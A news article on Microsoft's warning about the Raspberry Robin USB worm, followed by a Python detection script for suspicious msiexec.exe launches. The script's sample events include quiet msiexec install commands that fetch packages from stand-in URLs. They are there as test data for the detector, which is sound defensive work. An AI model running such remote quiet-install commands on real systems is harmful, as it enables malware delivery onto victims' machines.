Microsoft Detects Raspberry Robin Windows Worm in Hundreds of Enterprise Networks
Microsoft has warned customers about a new high-risk worm called “Raspberry Robin” that is infecting Windows PCs. The software giant has privately informed some Microsoft Defender for Endpoint users that the malware has been discovered in hundreds of enterprise networks across various industries (via Bleeping Computer).
Red Canary security researchers first discovered Raspberry Robin in September last year. They found that the worm spreads to new Windows machines via an infected USB drive that contains a .LNK file. Once the user clicks on the file, the malware uses the command prompt to create a “msiexec” process, which runs another malicious file on the compromised PC.
Additionally, the worm establishes a connection with its command and control (C2) server and uses Windows utilities to install additional malicious payloads on the victim’s system. The installed DLL files then attempt to communicate with Tor nodes.
Microsoft explained in its security advisory that the Raspberry Robin worm has been connecting to several IP addresses on the Tor network. However, the attackers have yet to use this access to deploy ransomware or steal sensitive data from the infected Windows devices.
Microsoft categorizes Raspberry Robin as a high-risk campaign
Microsoft has classified Raspberry Robin as a high-risk campaign because it could allow the threat actors to infect entire corporate networks. The researchers have detailed some indicators to help IT admins detect the Raspberry Robin malware.
“To detect suspicious use of msiexec.exe by Raspberry Robin or other threats, it’s essential to take a look at the command line and the URL. Detecting msiexec.exe making outbound network connections to download and install packages in the command line interface will give you the opportunity to examine the activity and determine if it’s malicious or not,” Red Canary researchers explained.
The security researchers have also advised that customers should not connect suspicious USB devices to their Windows PCs in order to prevent Raspberry Robin infections. If you’re interested, we invite you to check out Red Canary’s report, which provides detailed insights into how the worm works.
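The msiexec.exe guidance quoted above (look at the command line, look for a URL, and treat a remote package source as something to examine) can be turned into a small triage rule. The following is an added example written for this article, not code from Red Canary, Microsoft, or the Raspberry Robin report; the process-creation records are constructed in the style of Sysmon Event ID 1 fields (Image, CommandLine, ParentImage), and every URL and path in them is made up.

```python
import re
from typing import Dict, List, Optional

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# None of these hostnames or paths are real indicators from the campaign.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # benign: local .msi installed from Explorer
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'msiexec.exe /q /i "C:\Users\alice\Downloads\tool-x64.msi"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # suspicious: quiet install straight from a URL, launched by cmd.exe
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec /Q /I http://example.invalid:8080/Ab3/file.msi",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # suspicious: same pattern with dash-style switches and HTTPS
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"MSIEXEC.EXE -q -i https://pkg.example.invalid/agent.msi",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # not msiexec at all; must be ignored by the rule
        "Image": r"C:\Program Files\Vendor\updater.exe",
        "CommandLine": r"updater.exe --check https://updates.example.invalid/",
        "ParentImage": r"C:\Windows\System32\services.exe",
    },
]

URL_RE = re.compile(r'(?i)\b(?:https?|ftp)://[^\s"\'<>]+')
TOKEN_RE = re.compile(r'"[^"]*"|\S+')          # keep quoted paths as one token
QUIET_RE = re.compile(r"(?i)^[/-](?:q[nbrf]?|quiet)$")   # /q, /qn, /qb, /quiet ...
INSTALL_RE = re.compile(r"(?i)^[/-](?:i|package)$")      # /i or /package
# Parents that the article's description of the worm makes worth weighting
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' if the field is missing)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a triage record for an msiexec.exe launch, or None for other images."""
    if basename(event.get("Image", "")) != "msiexec.exe":
        return None
    cmd = event.get("CommandLine", "")
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmd)]
    urls = URL_RE.findall(cmd)                       # remote package source(s)
    quiet = any(QUIET_RE.match(t) for t in tokens)   # unattended install
    install = any(INSTALL_RE.match(t) for t in tokens)
    parent = basename(event.get("ParentImage", ""))
    shell_parent = parent in SHELL_PARENTS

    reasons = []
    if urls:
        reasons.append(f"remote package source: {urls[0]}")
    if quiet:
        reasons.append("quiet/unattended install switch")
    if shell_parent:
        reasons.append(f"spawned by {parent}")

    # A URL alone is worth a look; a URL plus quiet mode or a scripting-shell
    # parent is the combination the quoted guidance tells analysts to examine.
    if urls and (quiet or shell_parent):
        severity = "high"
    elif urls:
        severity = "medium"
    else:
        severity = "low"
    return {"command": cmd, "urls": urls, "quiet": quiet, "install": install,
            "parent": parent, "severity": severity, "reasons": reasons}


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Keep only msiexec launches that reference a remote package source."""
    findings = []
    for ev in events:
        rec = analyze_event(ev)
        if rec and rec["urls"]:
            findings.append(rec)
    return findings


if __name__ == "__main__":
    for rec in triage(SAMPLE_EVENTS):
        print(rec["severity"].upper(), rec["command"])
        for reason in rec["reasons"]:
            print("   -", reason)
```

On a real host the same fields come from Sysmon or the Defender for Endpoint process-creation telemetry rather than the constructed list above; the rule deliberately ignores local installs (the first record) so that ordinary software deployment does not drown out the handful of launches that fetch their package over the network.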